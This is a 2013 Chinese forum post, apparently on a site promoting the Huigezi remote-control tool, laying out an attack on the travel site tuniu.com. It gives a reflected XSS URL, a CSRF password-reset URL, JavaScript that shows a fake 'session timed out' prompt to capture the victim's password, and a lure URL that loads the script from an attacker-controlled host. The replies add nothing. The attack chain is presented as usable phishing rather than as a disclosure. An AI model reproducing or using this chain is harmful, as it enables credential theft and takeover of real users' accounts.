灰鸽子远程控制软件

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 11266|回复: 4

途牛网XSS+CSRF钓鱼式重置用户密码 灰鸽子下载www.huigezi.org

[复制链接]
发表于 2013-1-28 00:31:19 | 显示全部楼层 |阅读模式
记得某次面试时候说起这个利用,但是面试官觉得不可行。我觉得居然用户能被X也应该有可能被钓,还是有可行性的。

灰鸽子

灰鸽子
途牛网XSS+CSRF钓鱼式重置用户密码 灰鸽子下载www.huigezi.org
1.某处XSS:http://m.tuniu.com/?action=route ... mp;pdate=<ScRiPt >prompt(/xss/)</ScRiPt>&todo=index

2.修改密码处CSRF:http://www.tuniu.com/main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1

3.创建外部JS:

灰鸽子

灰鸽子

var pass;
pass=prompt("登陆超时,请重新输入您的密码","password");
url="http://www.tuniu.com/main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass;
window.location=url;


4.诱使用户访问
http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt/src=//www.your-site.com/1.js></ScRiPt>&todo=index
若用户输入其正确密码,JS内CSRF将会将其密码重置。

1表示重置成功,0表示重置失败。

感觉还可以结合一些XSSbypass。
使用其他window弹窗使用户输入密码密文*。
location跳转也可以改得成其他静默发送?

评帖赚银币(0) 收起
回复

使用道具 举报

发表于 2013-1-30 18:05:09 | 显示全部楼层
111111111111
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-1-30 18:05:23 | 显示全部楼层
111111111111
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-1-30 18:06:00 | 显示全部楼层

333333333333
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-2-1 14:40:21 | 显示全部楼层
听起来很给力啊
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|灰鸽子远程控制软件|灰鸽子远程控制软件 ( 鲁ICP备14000061号-4 )

GMT+8, 2024-11-1 12:41 , Processed in 0.074307 second(s), 31 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表